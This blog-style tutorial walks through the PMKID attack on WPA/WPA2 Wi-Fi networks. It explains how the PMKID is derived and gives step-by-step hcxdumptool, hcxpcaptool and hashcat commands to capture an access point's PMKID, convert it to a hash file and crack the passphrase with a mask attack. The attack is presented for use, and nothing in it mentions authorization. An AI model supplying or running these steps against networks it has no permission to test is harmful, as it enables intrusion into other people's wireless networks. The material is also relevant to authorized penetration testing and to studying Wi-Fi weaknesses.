Labels

HOW TO ATTACK ON WPA OR WPA2 WITH PMKID



Like you know most of the thing in this world is discovered accidentally, same like this in 2018 this attack was discovered while looking for new ways to attack the WPA3 security standard. By the way WPA3 is more harder to attack because it has a capability of modern key establishment protocol called (SAE) "Simultaneous Authentication of Equals".


This attack need the following tools.
hcxdumptool v4.2.0 or higher
hcxtools v4.2.0 or higher
hashcat v4.2.0 or higher

In this attack the main difference from existing attack is that in this attack we can't required the capture of a full EAPOL frame.

This attack is not work on all routers. It will work against all 802.11i/p/q/r network with roming function enabled.

The main advantages of this attack is this attack are as following:
  • No more regular users required because the attacker directly communicates with the AP.
  • No more  waiting for a complete 4-way handshake between the regular user and the AP.
  • No more eventual re-transmissions of EAPOL frames.
  • No more eventual invalid passwords sent by the regular user.
  • No more lost EAPOL frame when the regular user or the AP is too far away from the attacker
  • No more fixing of nonce and replaycounter value required.
  • No more spacial output format (pcap, hccapx, etc).
Detail about attack:


RSN IE is an optional field that can be found in 802.11 management frames. One of the RSN capabilities is the PMKID.


The PMKID is computed by using HMAC-SHAI where the key is PMK and the data part is the concatenation of a fixed string label "PMK Name", the access point is MAC adddress and the station's MAC address.

code:
PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)


PMK is the same as in a regular EAPOL 4-handshake this is an ideal attacking vector.

We receive all the data we need in the first EAPOL frame from the AP.

Responce:

First Run the hcxdumptool to request the PMKID from the AP and the recieved frame to a file in pcapng format.

1.
       $ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 --enable_status

After some process message came "FOUND PMKID".

2. 
   $ ./hcxpcaptool -z test.16800 test.pcapng

After process written file come which look like 

2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a

The colum has:

PMKID

MAC AP

MAC STATION

ESSID


       $ ./hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng

3. Run hashcat to crack it

      $ ./hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'


Labels:

Popular Posts